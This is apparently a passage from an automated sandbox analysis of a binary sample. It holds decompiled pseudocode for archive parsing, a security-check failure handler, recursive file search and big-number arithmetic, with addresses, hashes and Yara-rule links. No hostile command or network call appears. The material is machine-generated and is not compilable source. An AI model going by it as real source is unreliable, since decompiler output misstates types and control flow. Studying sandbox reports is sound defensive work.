														goto L55;
													}
													__eflags = _t649 == 6;
													if(_t649 == 6) {
														goto L52;
													}
													 *(_t685 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t562 & 0x00000010;
											if((_t562 & 0x00000010) == 0) {
												goto L39;
											}
											_t397 = 1;
											goto L40;
										}
										__eflags = _t562 & 0x00000010;
										if((_t562 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t396 = 1;
											_t641 = 0;
											goto L36;
										}
									}
									__eflags = _t536 - 5;
									if(_t536 != 5) {
										goto L115;
									} else {
										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
										_t651 =  *(_t518 + 0x4598);
										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
										_t628 = _t651 >> 0x00000001 & 0x00000001;
										_t638 = _t651 >> 0x00000003 & 0x00000001;
										 *(_t518 + 0x45ad) = _t628;
										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x45af) = _t638;
										__eflags = _t628;
										if(_t628 != 0) {
											 *((intOrPtr*)(_t518 + 0x45a4)) = E0019C29E(_t698 + 0x24);
										}
										__eflags =  *(_t518 + 0x45af);
										if( *(_t518 + 0x45af) != 0) {
											_t505 = E0019C269(_t698 + 0x24) & 0x0000ffff;
											 *(_t518 + 0x45a8) = _t505;
											 *(_t518 + 0x6cd8) = _t505;
										}
										goto L121;
									}
								}
								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E00191EF8(_t518);
							L133:
							E0019159C(_t698 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
							return  *((intOrPtr*)(_t698 + 0x1c));
						}
					}
					L8:
					E00193DAB(_t518, _t638);
					goto L133;
				}
				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
				asm("adc eax, ecx");
				_t707 =  *(_t518 + 0x6ca4);
				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
					goto L6;
				} else {
					 *((char*)(_t698 + 0x5f)) = 1;
					E00193C40(_t518);
					_push(8);
					_push(_t698 + 0x14);
					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
						goto L8;
					} else {
						_t697 = _t518 + 0x1024;
						E0019607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
						goto L7;
					}
				}
			}

0x00192692
0x0019269b
0x001926a5
0x001926ac
0x001926b3
0x001926b6
0x001926bf
0x001926c2
0x001926c5
0x001926cc
0x00192734
0x00192734
0x00192737
0x0019273b
0x00192744
0x00192760
0x00192766
0x00192775
0x0019277d
0x00192783
0x0019278e
0x00192799
0x0019279c
0x001927a2
0x001927a8
0x001927aa
0x001927b8
0x001927b8
0x001927bb
0x001927f0
0x001927bd
0x001927bd
0x001927bd
0x001927c0
0x001927e4
0x001927c2
0x001927c2
0x001927c2
0x001927c5
0x001927d8
0x001927c7
0x001927c7
0x001927ca
0x001927cc
0x001927cc
0x001927ca
0x001927c5
0x001927c0
0x001927fa
0x00192800
0x00192806
0x00192809
0x0019280f
0x00192812
0x0019281d
0x00192820
0x00192821
0x00192824
0x00192844
0x0019284a
0x00192850
0x00192853
0x00192859
0x0019285c
0x0019285f
0x00192f78
0x00192f80
0x00192f87
0x00192f8e
0x00192f9b
0x00192fad
0x00192fb2
0x00192fb8
0x00192fca
0x00192fd0
0x00192fdd
0x00192fea
0x00192ff7
0x00192ffd
0x00192fff
0x0019300c
0x0019300e
0x0019300e
0x0019300f
0x0019300f
0x0019301b
0x0019302b
0x0019302b
0x0019302e
0x00193034
0x0019303a
0x0019303c
0x0019303d
0x00193042
0x0019304a
0x00193050
0x001930d9
0x001930dc
0x00000000
0x001930dc
0x00193056
0x0019305c
0x0019305f
0x00000000
0x00000000
0x00193061
0x00193064
0x00000000
0x00000000
0x00193066
0x00193069
0x001930ab
0x001930b2
0x001930b9
0x001930be
0x001930c2
0x00000000
0x00000000
0x001930cb
0x001930d0
0x00000000
0x001930d0
0x0019306b
0x00193072
0x00000000
0x00000000
0x0019307f
0x0019307f
0x00193082
0x00193088
0x0019308b
0x0019308f
0x00193091
0x00193098
0x0019309c
0x0019309f
0x001930a2
0x001930a2
0x001930a2
0x001930a7
0x001930a9
0x00000000
0x00000000
0x00000000
0x001930a9
0x00193001
0x00193003
0x0019300a
0x00000000
0x00000000
0x00000000
0x0019300a
0x00192865
0x00192f4e
0x00192f4e
0x00192f58
0x00192f66
0x00192f6c
0x00192f6c
0x00000000
0x00192f58
0x0019286b
0x0019286e
0x00192902
0x0019290a
0x00192919
0x0019291d
0x00192920
0x00192927
0x00192930
0x00192932
0x00192936
0x0019293c
0x00192941
0x0019294d
0x0019295a
0x00192967
0x0019296d
0x00192970
0x0019297d
0x0019297d
0x0019297d
0x0019297f
0x00192981
0x00192981
0x00192987
0x0019298a
0x00192996
0x00192996
0x00192998
0x00192998
0x001929a3
0x001929a5
0x001929aa
0x001929b0
0x001929b6
0x001929bf
0x001929cf
0x001929cf
0x001929b8
0x001929b8
0x001929ba
0x001929ba
0x001929d1
0x001929e7
0x001929ed
0x001929fb
0x00192a06
0x00192a11
0x00192a14
0x00192a26
0x00192a34
0x00192a3f
0x00192a4f
0x00192a5d
0x00192a60
0x00192a65
0x00192a68
0x00192a6b
0x00192a6e
0x00192a71
0x00192a73
0x00192a75
0x00192a77
0x00192a77
0x00192a75
0x00192a80
0x00192a86
0x00192a8c
0x00192ad1
0x00192ad1
0x00192ad4
0x00192ade
0x00192ae0
0x00192af2
0x00192af2
0x00192afc
0x00192afc
0x00192b02
0x00192b04
0x00192b0e
0x00192b13
0x00192b15
0x00192b17
0x00192b21
0x00192b21
0x00192b13
0x00192b28
0x00192b2b
0x00192b37
0x00192b37
0x00000000
0x00192b2d
0x00192b2d
0x00192b30
0x00000000
0x00000000
0x00192b34
0x00192b39
0x00192b39
0x00192b45
0x00192b45
0x00192b47
0x00192b4d
0x00192b7b
0x00192b7f
0x00192b81
0x00192b83
0x00192b83
0x00192b83
0x00192b86
0x00192b86
0x00192b91
0x00192b97
0x00192b9e
0x00192ba4
0x00192ba6
0x00192bac
0x00192bb3
0x00192bb9
0x00192bc0
0x00192bc6
0x00192bc6
0x00192bcc
0x00192bcf
0x00192bd4
0x00192bd7
0x00192bd9
0x00192bdb
0x00192bdd
0x00192bdd
0x00192beb
0x00192bf0
0x00192bf2
0x00192bf6
0x00192bfd
0x00192c7e
0x00192c88
0x00192c93
0x00192c96
0x00192c9d
0x00192c9f
0x00192c9f
0x00192c9f
0x00192ca2
0x00192ca4
0x00192da6
0x00192caa
0x00192cb3
0x00192cb6
0x00192cc5
0x00192ccf
0x00192cd3
0x00192cda
0x00192cdc
0x00192ce2
0x00192ce9
0x00192cf2
0x00192cf8
0x00192cf9
0x00192d05
0x00192d09
0x00192d0f
0x00192d11
0x00192d19
0x00192d1f
0x00192d21
0x00192d2b
0x00192d2d
0x00192d38
0x00192d40
0x00192d5d
0x00192d6d
0x00192d73
0x00192d76
0x00192d81
0x00192d89
0x00192d8e
0x00192d91
0x00192d94
0x00192d97
0x00192d99
0x00192d9b
0x00192d9e
0x00192d9e
0x00192d99
0x00192ce9
0x00192cdc
0x00192daf
0x00192db6
0x00192db8
0x00192dba
0x00192dba
0x00192bff
0x00192c01
0x00192c04
0x00192c07
0x00192c0e
0x00192c13
0x00192c1f
0x00192c24
0x00192c27
0x00192c29
0x00192c2b
0x00192c3e
0x00192c48
0x00192c48
0x00192c4d
0x00192c4d
0x00192c4d
0x00192c4f
0x00192c52
0x00192c54
0x00192c56
0x00192c5b
0x00192c62
0x00192c63
0x00192c63
0x00192c6b
0x00192c6b
0x00192dc1
0x00192dc8
0x00192dd6
0x00192dd6
0x00192de4
0x00192de9
0x00192df0
0x00192ed4
0x00192ef5
0x00192efe
0x00192f0a
0x00192f10
0x00192f18
0x00192f1a
0x00192f27
0x00192f2e
0x00192f33
0x00192f37
0x00192f44
0x00192f44
0x00192f37
0x00000000
0x00192df6
0x00192df9
0x00192e07
0x00192e10
0x00192e19
0x00192e1c
0x00192e1e
0x00192e20
0x00192e23
0x00192e25
0x00192e28
0x00192e2b
0x00192e2d
0x00192e35
0x00192e37
0x00192e3a
0x00000000
0x00000000
0x00192e40
0x00192e45
0x00000000
0x00000000
0x00192e47
0x00192e49
0x00192e58
0x00192e58
0x00192e65
0x00192e6a
0x00192e6d
0x00192e6f
0x00192e6f
0x00192e6f
0x00192e6f
0x00192e72
0x00192e74
0x00192e77
0x00192e77
0x00192e7a
0x00192eab
0x00192eab
0x00192eab
0x00192eb2
0x00192eb9
0x00192ebe
0x00192e7c
0x00192e7e
0x00192e81
0x00192e81
0x00192e84
0x00192e87
0x00192e89
0x00192e96
0x00192e98
0x00192e9e
0x00192ea0
0x00192ea3
0x00192ea3
0x00192ea3
0x00192ea8
0x00000000
0x00192ea8
0x00192ec1
0x00192ec1
0x00192ec2
0x00192ec5
0x00192ec5
0x00192ece
0x00192ed1
0x00000000
0x00192ed1
0x00192df0
0x00192b5a
0x00192b5c
0x00192b61
0x00192b65
0x00192b67
0x00192b75
0x00192b77
0x00000000
0x00192b77
0x00192b69
0x00192b6c
0x00000000
0x00000000
0x00192b70
0x00000000
0x00192b71
0x00192b2b
0x00192ae2
0x00192ae4
0x00000000
0x00000000
0x00192ae6
0x00192ae8
0x00192aea
0x00192aea
0x00000000
0x00192a8e
0x00192a8e
0x00192a8e
0x00192a91
0x00192ac7
0x00000000
0x00192ac7
0x00192a94
0x00192a94
0x00192a97
0x00192abb
0x00000000
0x00192abb
0x00192a99
0x00192a99
0x00192a9c
0x00192aaf
0x00192aaf
0x00000000
0x00192aaf
0x00192a9e
0x00192aa1
0x00000000
0x00000000
0x00192aa3
0x00000000
0x00192aa3
0x00192a8c
0x0019298c
0x0019298f
0x00000000
0x00000000
0x00192993
0x00000000
0x00192993
0x00192972
0x00192975
0x00000000
0x00192977
0x00192977
0x00192979
0x00000000
0x00192979
0x00192975
0x00192874
0x00192877
0x00000000
0x0019287d
0x00192889
0x00192891
0x00192899
0x001928a8
0x001928b0
0x001928b3
0x001928b9
0x001928bf
0x001928c5
0x001928c7
0x001928d1
0x001928d1
0x001928d7
0x001928de
0x001928ec
0x001928ef
0x001928f5
0x001928f5
0x00000000
0x001928de
0x00192877
0x00192814
0x0019281b
0x00000000
0x00000000
0x00000000
0x0019281b
0x0019280b
0x0019280b
0x00000000
0x001927ac
0x001927ae
0x001930df
0x001930e2
0x001930f0
0x001930fb
0x001930fb
0x001927aa
0x00192746
0x00192748
0x00000000
0x00192748
0x001926d6
0x001926d8
0x001926da
0x001926e0
0x00000000
0x001926ec
0x001926ee
0x001926f2
0x001926fc
0x001926fe
0x00192707
0x00000000
0x00192709
0x00192719
0x0019272a
0x0019272f
0x00000000
0x0019272f
0x00192707

APIs

__EH_prolog.LIBCMT ref: 0019269B
_strlen.LIBCMT ref: 00192C1F

Part of subcall function 001A0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0019B312,00000000,?,?,?,0019004A), ref: 001A0FFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00192D76

Strings

CMT, xrefs: 00192DA9

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 1ed5750ee943359a167ad3a33f4fe78bda8b65583f57c64116a8b99c24d8cd95
Instruction ID: 0f6153642e5b5366c034de5c62efcba7054acedd959740aa67856d6fa45681c4
Opcode Fuzzy Hash: 1ed5750ee943359a167ad3a33f4fe78bda8b65583f57c64116a8b99c24d8cd95
Instruction Fuzzy Hash: AC6206716002849FDF29DF74C895AEA3BE1EF64304F09457EFC9A9B282DB709945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001B7BE1, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E001B7BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x1cd668; // 0x44aa1787
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E001AE690(_t41);
					_pop(_t61);
				}
				E001AE920(_t66,  &_v804, 0, 0x50);
				E001AE920(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E001AE690(_t57);
				}
				return E001AE203(_t57, _v8 ^ _t69);
			}

0x001b7be1
0x001b7be1
0x001b7be1
0x001b7be1
0x001b7bec
0x001b7bf1
0x001b7bf3
0x001b7bfb
0x001b7bfd
0x001b7c00
0x001b7c05
0x001b7c05
0x001b7c11
0x001b7c24
0x001b7c32
0x001b7c38
0x001b7c3e
0x001b7c44
0x001b7c4a
0x001b7c50
0x001b7c56
0x001b7c5c
0x001b7c62
0x001b7c68
0x001b7c6f
0x001b7c76
0x001b7c7d
0x001b7c84
0x001b7c8b
0x001b7c92
0x001b7c93
0x001b7c9c
0x001b7ca2
0x001b7ca2
0x001b7ca5
0x001b7cab
0x001b7cb8
0x001b7cc1
0x001b7cca
0x001b7cd3
0x001b7ce1
0x001b7ce3
0x001b7ce9
0x001b7cf8
0x001b7d04
0x001b7d07
0x001b7d0c
0x001b7d1b

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 001B7CD9
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 001B7CE3
UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 001B7CF0

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 26ca22d0da76e8a6d34c48d09e038f92164e6a74559a0b2a88bc63094a79101a
Instruction ID: f82ba1842806a47191262eabcd309a8b2a662bb6d6553f27019148f84cfebeac
Opcode Fuzzy Hash: 26ca22d0da76e8a6d34c48d09e038f92164e6a74559a0b2a88bc63094a79101a
Instruction Fuzzy Hash: 0A31C27490122CABCB61DF64D889BDDBBB8BF58350F5045EAE41CA7290EB709F818F44

Uniqueness

Uniqueness Score: -1.00%

Function 001B9FD3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E001B9FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				intOrPtr _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t104 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t104 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t110 = E001B7B1B(_t84, _t77, 1);
					_pop(_t86);
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t104;
						_t40 = E001BDD71(_t86, _t110 + _t104, _t77, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E001BA212(_a16, _t100, __eflags, _t110);
							E001B7A50(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t104);
						_t74 = E001BDD71(_t86, _t110, _t77, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E001B7DBB();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0x1cd668; // 0x44aa1787
							_v48 = _t43 ^ _t117;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t110);
							_t111 = _v332.cAlternateFileName;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E001BDDC0(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E001AE920(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E001B9FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E001B5030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E001B9E2B);
									}
								} else {
									_push(_t55);
									_t57 = E001B9FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									FindClose(_t112);
								}
								_t58 = _t105;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t111);
									_t58 = E001B9FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
								}
							}
							__eflags = _v12 ^ _t117;
							return E001AE203(_t58, _v12 ^ _t117);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}

0x001b9fd8
0x001b9fd9
0x001b9fdc
0x001b9fdc
0x001b9fdf
0x001b9fdf
0x001b9fe1
0x001b9fe2
0x001b9feb
0x001b9fec
0x001b9fef
0x001b9ff2
0x001b9ff7
0x001b9ffe
0x001b9fff
0x001ba000
0x001ba003
0x001ba00d
0x001ba010
0x001ba011
0x001ba013
0x001ba027
0x001ba027
0x001ba02a
0x001ba034
0x001ba039
0x001ba03c
0x001ba03e
0x00000000
0x001ba040
0x001ba044
0x001ba04d
0x001ba053
0x00000000
0x001ba056
0x001ba015
0x001ba015
0x001ba01b
0x001ba020
0x001ba023
0x001ba025
0x001ba05c
0x001ba05e
0x001ba05f
0x001ba060
0x001ba061
0x001ba062
0x001ba063
0x001ba068
0x001ba06c
0x001ba06e
0x001ba074
0x001ba07b
0x001ba07e
0x001ba081
0x001ba082
0x001ba085
0x001ba086
0x001ba089
0x001ba08a
0x001ba0ab
0x001ba0ab
0x001ba0ad
0x00000000
0x00000000
0x001ba092
0x001ba094
0x001ba096
0x001ba098
0x001ba09a
0x001ba09c
0x001ba09e
0x001ba0a9
0x00000000
0x001ba0a9
0x001ba09e
0x001ba09a
0x00000000
0x001ba096
0x001ba0af
0x001ba0b1
0x001ba0b4
0x001ba0cd
0x001ba0cd
0x001ba0cf
0x001ba0d2
0x001ba0e2
0x001ba0e4
0x001ba0e4
0x001ba0d4
0x001ba0d4
0x001ba0d7
0x00000000
0x001ba0d9
0x001ba0d9
0x001ba0dc
0x00000000
0x001ba0de
0x001ba0de
0x001ba0de
0x001ba0dc
0x001ba0d7
0x001ba0ea
0x001ba0f2
0x001ba0f6
0x001ba104
0x001ba109
0x001ba11e
0x001ba120
0x001ba126
0x001ba129
0x001ba15b
0x001ba15b
0x001ba15d
0x001ba160
0x001ba166
0x001ba166
0x001ba16d
0x001ba187
0x001ba187
0x001ba196
0x001ba19b
0x001ba19e
0x001ba1a0
0x00000000
0x00000000
0x00000000
0x00000000
0x001ba16f
0x001ba16f
0x001ba175
0x001ba177
0x00000000
0x001ba179
0x001ba179
0x001ba17c
0x00000000
0x001ba17e
0x001ba17e
0x001ba185
0x00000000
0x00000000
0x00000000
0x00000000
0x001ba185
0x001ba17c
0x001ba177
0x00000000
0x001ba1a2
0x001ba1aa
0x001ba1b0
0x001ba1b2
0x001ba1b2
0x001ba1ba
0x001ba1bf
0x001ba1c7
0x001ba1ca
0x001ba1cc
0x001ba1e0
0x001ba1e5
0x001ba12b
0x001ba12b
0x001ba12f
0x001ba137
0x001ba137
0x001ba137
0x001ba139
0x001ba13c
0x001ba13f
0x001ba13f
0x001ba145
0x001ba0b6
0x001ba0b9
0x001ba0bb
0x00000000
0x001ba0bd
0x001ba0bd
0x001ba0c3
0x001ba0c8
0x001ba0bb
0x001ba14c
0x001ba157
0x00000000
0x00000000
0x00000000
0x001ba025
0x001b9ff9
0x001b9ffb
0x001ba057
0x001ba05b
0x001ba05b
0x00000000

Strings

., xrefs: 001BA166

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: f5cae65dc1247020027bf2b02ff279085aa99d7caebb56a771d02bedb13e3b6d
Instruction ID: 206eae9716face375af3291761dde21c10605f2ccc755dbfde301a8a54a87dca
Opcode Fuzzy Hash: f5cae65dc1247020027bf2b02ff279085aa99d7caebb56a771d02bedb13e3b6d
Instruction Fuzzy Hash: A331F271900249AFCB249E78CC84EFB7BBDDF86314F5402A8F959D7291EB309D458B60

Uniqueness

Uniqueness Score: -1.00%

Function 001BC0B0, Relevance: 3.5, APIs: 2, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001BC0B0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
